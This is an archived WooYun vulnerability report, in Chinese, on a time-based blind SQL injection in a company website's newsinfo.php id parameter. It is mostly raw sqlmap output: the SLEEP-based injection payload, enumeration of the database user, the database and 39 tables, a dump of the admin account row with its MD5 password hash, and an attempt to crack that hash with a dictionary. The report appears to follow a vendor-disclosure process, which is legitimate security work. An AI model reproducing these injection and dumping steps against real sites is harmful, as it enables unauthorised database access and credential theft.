乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
坑啊 为了注出管理员,从昨天4点sqlmap跑到今天早上,延时注入最恶心的是居然还解不出,你个管理员好好的设置那么难的密码干啥
是不是太美,官网地址
注入点:
**.**.**.**/newsinfo.php?id=18&catid=1
简单and 1=1 and 1=2 测试发现不一样所以直接丢进sqlmap
Place: GETParameter: id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=18) AND SLEEP(5) AND (1892=1892&catid=1---[18:27:01] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[18:27:01] [INFO] fetching current user[18:27:01] [INFO] retrieved:[18:27:01] [WARNING] it is very important not to stress the network adapter'sndwidth during usage of time-based queries[18:27:17] [INFO] adjusting time delay to 4 seconds due to good response timestsaochee_maindb@localhostcurrent user: 'tsaochee_maindb@localhost'
[18:46:32] [WARNING] increasing time delay to 4 secondsaochee_maindbavailable databases [1]:[*] tsaochee_maindb
39个表,时间盲注太慢了,我直接跑出重要表段
[18:52:59] [INFO] retrieved:[18:53:11] [INFO] adjusting time delay to 4 seconds due to good39[18:53:33] [INFO] retrieved: st_address[18:57:27] [ERROR] invalid character detected. retrying..[18:57:27] [WARNING] increasing time delay to 5 seconds_area[18:59:23] [INFO] retrieved: st_address_city[19:02:12] [INFO] retrieved: st_admin_group[19:06:59] [INFO] retrieved: st_admin_menu[19:09:51] [INFO] retrieved: st_admin_menulist[19:13:10] [ERROR] invalid character detected. retrying..[19:13:10] [WARNING] increasing time delay to 6 seconds[19:13:14] [INFO] retrieved: st_admin_permisions[19:19:44] [ERROR] invalid character detected. retrying..[19:19:44] [WARNING] increasing time delay to 7 seconds[19:19:48] [INFO] retrieved: st_admin_user[19:23:14] [INFO] retrieved: st_album_cat[19:28:24] [ERROR] invalid character detected. retrying..[19:28:24] [WARNING] increasing time delay to 8 seconds[19:28:29] [INFO] retrieved: st_al
st_admin_user
Database: tsaochee_maindb[39 tables]+----------------------+| `st_interview\x03` || st_address_area || st_address_city || st_admin_group || st_admin_menu || st_admin_menulist || st_admin_permisions || st_admin_user || st_album_cat || st_album_cat_list || st_album_pic || st_appli || st_application || st_application2 || st_application3 || st_article || st_article_cat || st_banner || st_banner_cat || st_carewin || st_classes || st_classes_datelistH || st_event_cat || st_event_cat_list || st_index_about || st_life || st_mail_tpl || st_member || st_news || st_news_cat || st_pdt_banner || st_product || st_product_cat || st_service || st_share || st_site_basic || st_site_global || st_site_meta || st_suuermqn |+----------------------+
擦为了管理员密码 搞的这么晚
se 'tsaochee_maindb'[00:13:49] [INFO] resumed: 1[00:13:49] [INFO] retrieved:[00:13:52] [INFO] retrieved:[00:13:56] [INFO] retrieved: admin[00:14:55] [INFO] retrieved: 0[00:15:12] [INFO] retrieved: 1[00:15:24] [INFO] retrieved:[00:15:27] [INFO] retrieved: 0[00:15:45] [INFO] retrieved:[00:15:48] [INFO] retrieved: admin[00:16:47] [INFO] retrieved: 0[00:17:04] [INFO] retrieved: 0[00:17:24] [ERROR] invalid character detected. retrying..[00:17:24] [WARNING] increasing time delay to 3 seconds9f735a0e7134c506098cc2929[00:23:36] [ERROR] invalid character detected. retrying..[00:23:36] [WARNING] increasing time delay to 4 seconds75d249[00:25:27] [INFO] analyzing table dump for possible password hashesrecognized possible password hashes in column 'password'. Do you want to chem via a dictionary-based attack? [Y/n/q] y[00:28:42] [INFO] using hash method 'md5_generic_passwd'what dictionary do you want to use?[1] default dictionary file 'E:\sqlmap\sqlmap\Bin\txt\wordlist.txt' (press)[2] custom dictionary file[3] file with list of dictionary files>[00:28:47] [INFO] using default dictionary[00:28:47] [INFO] loading dictionary from 'E:\sqlmap\sqlmap\Bin\txt\wordli'do you want to use common password suffixes? (slow!) [y/N] y[00:28:51] [INFO] starting dictionary-based cracking (md5_generic_passwd)[00:28:51] [WARNING] multiprocessing hash cracking is currently not suppor this platform[00:29:13] [INFO] using suffix '1'[00:29:18] [INFO] current status: a1soh... /
[1 entry]+------------+-------------+---------+---------+----+-------+-----------+-----------+----------+--------+----------------------------------+| `\x7ftime` | `lastlo?in` | account | groupid | id | jmail | loadlevel | logincode | nickname | online | password |+------------+-------------+---------+---------+----+-------+-----------+-----------+----------+--------+----------------------------------+| <blank> | <blank> | admin | 0 | 1 | <blank> | 0 | <blank> | admin | 0 | 09f735a0e7134c506098cc292975d249 |+------------+-------------+---------+---------+----+-------+-----------+-------
问了社区,都解不出了
危害等级:高
漏洞Rank:16
确认时间:2015-12-18 13:51
感謝通報
暂无